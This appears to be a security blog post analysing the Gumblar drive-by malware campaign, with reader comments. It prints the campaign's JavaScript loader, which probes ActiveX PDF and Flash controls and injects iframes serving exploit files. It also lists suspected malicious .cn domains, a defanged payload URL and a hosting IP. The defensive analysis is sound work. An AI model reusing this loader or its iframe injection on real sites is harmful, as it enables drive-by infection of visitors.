Exploits Employed by Gumblar
Gumblar compromises clients using 2 different exploits. The first is a Adobe Acrobat PDF exploit CVE-2008-2992 and the second is a Adobe Flash exploit. Unfortunately I haven’t been able to figure out which Flash exploit is employed as decoding flash is not an expertise of mine.
Here is the Wepawet output of the exploit script employed on each of the hostile domains I mentioned in my previous post.
Virus Total results for the main exploit script
Virus Total results for the flash exploit
Virus Total results for the PDF exploit
Exploit code is hosted at:
[gumblarserver].cn:8080/
[gumblarserver].cn:8080/cache/flash.swf
[gumblarserver].cn:8080/cache/readme.pdf
The following is the portion of the script that loads the exploits. The pdfswf() function executes and loads two iframes which reference the exploits.
function pdfswf()
{
PDF = new Array(”AcroPDF.PDF”, “PDF.PdfCtrl”);
for(i in PDF)
{
try
{
obj = new ActiveXObject(PDF[i]);
if (obj)
{
document.write(’<iframe src=”cache/readme.pdf”></iframe>’);
}
}
catch(e){}
}
try
{
obj = new ActiveXObject(”ShockwaveFlash.ShockwaveFlash”);
if (obj)
{
document.write(’<iframe src=”cache/flash.swf”></iframe>’);
}
}
catch(e){}
}
pdfswf();
On an interesting note, it appears the location of where the malware author might have compiled the flash file is embedded in the flash movie. This information is gathered from using: swfdump -atpdu flash.swf.
-=> 65 72 47 43 3a 5c 44 6f 63 75 6d 65 6e 74 73 20 erGC:\Documents
-=> 61 6e 64 20 53 65 74 74 69 6e 67 73 5c 64 65 76 and Settings\dev
-=> 5c 44 65 73 6b 74 6f 70 5c 65 78 70 3b 3b 48 51 \Desktop\exp;;HQ
C:\Documents and Settings\dev\Desktop\exp
More Gumblar domains are hosted on 70.85.142.250 Link
I haven’t checked all of them, but these are the domains that I suspect are involved.
casinoslotbet.cn
bigbestfind.cn
autobestwestern.cn
casinoslotbet.cn
bigbestfind.cn
findbigbrother.cn
finditbig.cn
giantbeaversdiet.cn
giantnonfat.cn
greatbethere.cn
tvnameshop.cn
My personal favorite would have to be giantbeaversdiet.cn which hosts the binary payload that starts the chain of infection as described in the previous post. (hxxp://giantbeaversdiet.cn:8080/landig.php?id=8)
Who comes up with these domain names anyway??
These are similar to websites I investigated after seeing a Craigslist ad for help cleaning Websites(blog comment malframes). I ran these through Wepawet on April 24…
litecarfinestsite.cn
liteautomobileinsurance.cn
bigfirststopnonfat.cn
liteupyourride.cn
They dropped swf/pdf files, ran ActiveX PDF attacks, and dropped a windows pe at the end…Anubis found it added digiwet.dll to the system…I believe I saw this same file in the Gumblar analysis.
Thanks for the interesting analysis
Hi Andrew,
I too came across a similar malware, but I am stuck at one point in the wepawet analysis.
In the segment “var Kkbfhqas=” what is the decoded output of the variable. I had read some place that this is the ’shellcode’, but I am not able to figure that out myself . Any inputs on this or how I can better understand this segment ?
Thanks